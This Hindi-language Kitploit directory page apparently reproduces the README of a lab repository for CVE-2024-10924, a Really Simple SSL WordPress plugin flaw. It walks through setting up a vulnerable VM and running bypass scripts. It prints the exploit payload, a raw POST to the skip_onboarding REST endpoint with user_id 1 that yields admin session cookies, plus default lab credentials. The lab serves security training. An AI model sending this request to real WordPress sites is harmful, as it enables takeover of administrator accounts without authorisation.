Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10924-Bypass-MFA-Wordpress-LAB — CVE-2024-10924 के लिए लेब वातावरण और एक्सप्लॉइट स्क्रिप्ट, WordPress में Really Simple SSL प्लगइन के skip_onboarding एंडपॉइंट के माध्यम से MFA बायपास प्रदर्शित करता है | Kitploit
उपकरण/GitHubGitHub/d1se0/cve-2024-10924-bypass-mfa-wordpress-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास
GitHub
d1se0/cve-2024-10924-bypass-mfa-wordpress-lab

CVE-2024-10924-Bypass-MFA-Wordpress-LAB

CVE-2024-10924 के लिए लेब वातावरण और एक्सप्लॉइट स्क्रिप्ट, WordPress में Really Simple SSL प्लगइन के skip_onboarding एंडपॉइंट के माध्यम से MFA बायपास प्रदर्शित करता है

रिपॉजिटरी देखें
421 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10924 MFA को बायपास करें WordPress - एक्स्प्लॉइट लैब

यह रिपॉजिटरी WordPress में CVE-2024-10924 कमज़ोरी का शोषण करने के लिए एक लैब प्रदान करती है, विशेष रूप से दो-कारक प्रमाणीकरण (MFA) को बायपास करने और WordPress प्रशासन पैनल तक पहुँच प्राप्त करने के लिए।

पूर्वापेक्षाएँ

अपने वातावरण में इस लैब को तैनात करने के लिए, नीचे दिए गए चरणों का पालन करें:

VMware पर WordPress तैनात करें

आपको लैब के ज़िप को अनज़िप करना होगा, VMWare में जाकर आपको मशीन आयात करने के लिए Open पर क्लिक करना होगा, हम Ubuntu-Bypass-MFA-Wordpress.vmx नामक फ़ाइल चुनते हैं, और अंत में कमज़ोर मशीन को चालू करने के लिए पर क्लिक करना होगा।

Power

Download LAB

Kali Linux कॉन्फ़िगर करें

अपनी Kali मशीन पर, आवश्यक टूल्स इंस्टॉल करें और सुनिश्चित करें कि निम्नलिखित एप्लिकेशन इंस्टॉल हैं:

  • nmap: नेटवर्क स्कैन करने के लिए।
  • requests: HTTP अनुरोध करने के लिए (यदि आपके पास नहीं है, तो pip install requests से requests इंस्टॉल करें)।
  • rich: कंसोल पर सुंदर आउटपुट के लिए (pip install rich से इंस्टॉल करें)।

WordPress मशीन का IP प्राप्त करें

नेटवर्क वातावरण में WordPress मशीन का IP प्राप्त करने के लिए, अपनी Kali मशीन से निम्नलिखित स्क्रिप्ट चलाएँ:

root@kitploit:~
$ python3 knowIPwordpress.py
root@kitploit:~
यह स्क्रिप्ट निम्नलिखित कार्य करती है:

आपके स्थानीय IP का पता लगाती है। सक्रिय IPs खोजने के लिए संबंधित नेटवर्क सेगमेंट को स्कैन करती है। HTTP सेवाओं के लिए पोर्ट स्कैन करती है। जाँच करती है कि WordPress मशीन के IP के HTTP सेवा में शीर्षक "Bypass-MFA" है या नहीं। एक बार मिल जाने पर, यह आपको वह URL दिखाएगा जहाँ आप WordPress प्रशासन पैनल तक पहुँच सकते हैं:

root@kitploit:~
Accede a WordPress en: http://<IP>/wp-admin

डबल चेक बायपास (MFA):

WordPress क्रेडेंशियल्स:

root@kitploit:~
admin:admin

जब आप WordPress में लॉगिन करने का प्रयास करेंगे, तो यह आपसे दो-कारक सत्यापन (MFA) माँगेगा। इस चरण को बायपास करने के लिए, अपनी Kali पर निम्नलिखित स्क्रिप्ट चलाएँ:

root@kitploit:~
$ python3 bypass-MFA-Wordpress.py

bypass-MFA-Wordpress.py स्क्रिप्ट कैसे काम करती है यह स्क्रिप्ट CVE-2024-10924 कमज़ोरी का शोषण करती है और WordPress प्रशासन पैनल तक पहुँच प्राप्त करने के लिए डबल सत्यापन को बायपास करती है।

स्क्रिप्ट प्रवाह:

सत्र कुकी प्राप्त करें: स्क्रिप्ट एक वैध सत्र कुकी प्राप्त करने के लिए reallysimplessl/v1/two_fa/skip_onboarding एंडपॉइंट पर एक HTTP अनुरोध करती है।

अनुरोध निम्नलिखित जानकारी के साथ भेजा जाता है:

root@kitploit:~
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

लॉगिन अनुरोध:

कुकी प्राप्त होने के बाद, स्क्रिप्ट WordPress उपयोगकर्ता नाम और पासवर्ड का अनुरोध करती है। फिर, लॉगिन करने के लिए प्रदान किए गए क्रेडेंशियल्स के साथ wp-admin/profile.php एंडपॉइंट पर एक POST अनुरोध करें।

HTML फ़ाइल का निर्माण:

यदि बायपास सफल होता है, तो स्क्रिप्ट व्यवस्थापक डैशबोर्ड से प्रतिक्रिया को एक .html फ़ाइल में सहेजती है और इसे आपके डिफ़ॉल्ट ब्राउज़र में खोलती है।

अब आपके पास WordPress प्रशासन पैनल तक पहुँच होगी!

मैनुअल तरीका Bypass-MFA-Wordpress:

यदि आप इसे BurpSuite के साथ मैन्युअल रूप से करना चाहते हैं और हम उस एंडपॉइंट को जानना चाहते हैं जिस पर हमें कुकीज़ कैप्चर करने के लिए अनुरोध भेजना है, तो हम इसे निम्नलिखित तरीके से कर सकते हैं

root@kitploit:~
$ python3 endpointWordpress.py

यह हमें वह कोड बताएगा जो हमें कुकीज़ कैप्चर करने में सक्षम होने के लिए BurpSuite में डालना होगा, मेरे मामले में यह कुछ इस तरह होगा:

root@kitploit:~
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

वीडियो प्रारूप में मैनुअल तकनीक का प्रदर्शन:

https://github.com/user-attachments/assets/e70789d1-4fe4-46b4-81ef-76229dd265ce

मेरे YT वीडियो में अधिक जानकारी:

लिंक = वीडियो CVE-2024-10924-Bypass-MFA-Wordpress-LAB

टूल डाउनलोड करें